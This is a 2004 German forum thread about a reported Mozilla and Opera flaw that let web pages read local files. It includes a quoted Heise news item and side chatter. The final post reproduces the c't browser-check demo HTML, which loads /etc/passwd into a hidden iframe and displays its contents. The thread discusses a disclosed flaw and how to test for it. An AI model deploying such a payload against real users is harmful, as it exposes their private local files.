Verfasst am: 07.12.2004, 12:44| Heise hat folgendes geschrieben: |
|
Giovanni Delvecchio weist in einem Posting auf der Sicherheits-Mailingliste Full Disclosure auf ein mögliches Problem der alternativen Browser der Mozilla-Foundation und des norwegischen Software-Herstellers Opera hin: Über einen Trick können Webseiten lokale Dateien ausspionieren. ... Delvecchio gelang es nicht, auf diesem Weg auch mit dem Internet Explorer lokale Dateien auszulesen. Warum der Microsoft-Browser gegen diesen Trick immun sein sollte, ist allerdings nicht klar. ... Delvecchio hat die Entwickler von Mozilla und Opera unterrichtet, aber keine Antwort erhalten. |
Verfasst am: 07.12.2004, 12:51
Verfasst am: 07.12.2004, 14:08| Frank hat folgendes geschrieben: |
| Ihr solltet mal (falls nicht schon passiert) den c't-Browsercheck testen. |
Verfasst am: 07.12.2004, 14:25| frajo hat folgendes geschrieben: |
| (ich hatte mal so einen kunden an der hotline: "was kann ich nur machen? jeden monat werden mir 80 DM abgebucht, nachdem ich auf einer amerikanischen porno-seite meine kreditkartennummer eingab. nein, ich habe den rest auf der seite nicht verstanden; ich kann kein englisch.") |
Verfasst am: 07.12.2004, 14:35| Blaubär hat folgendes geschrieben: | ||
Was hast du dem denn geantwortet? |
Verfasst am: 07.12.2004, 14:40| Blaubär hat folgendes geschrieben: | ||
Was hast du dem denn geantwortet? |
Verfasst am: 08.12.2004, 14:08| Zitat: |
| <HTML>
<BODY onLoad="ReadFileContent()" > <iframe id="local_file" name="local_file" src="file:///etc/passwd" height=0 width=0> </iframe> <script> function ReadFileContent(){ alert(local_file.document.firstChild.innerHTML); } </script> <h2>c't-Browsercheck-Demo</h2> <P>Wenn ein Fenster Ihnen den Inhalt der Datei /etc/passwd anzeigt, hat die Demo funktioniert. Erscheint kein zusätzliches Fenster, ist sie fehlgeschlagen. Sie können dieses Fenster jetzt schließen.</P> </body> </html> |
output generated using printer-friendly topic mod. Alle Zeiten sind GMT + 1 Stunde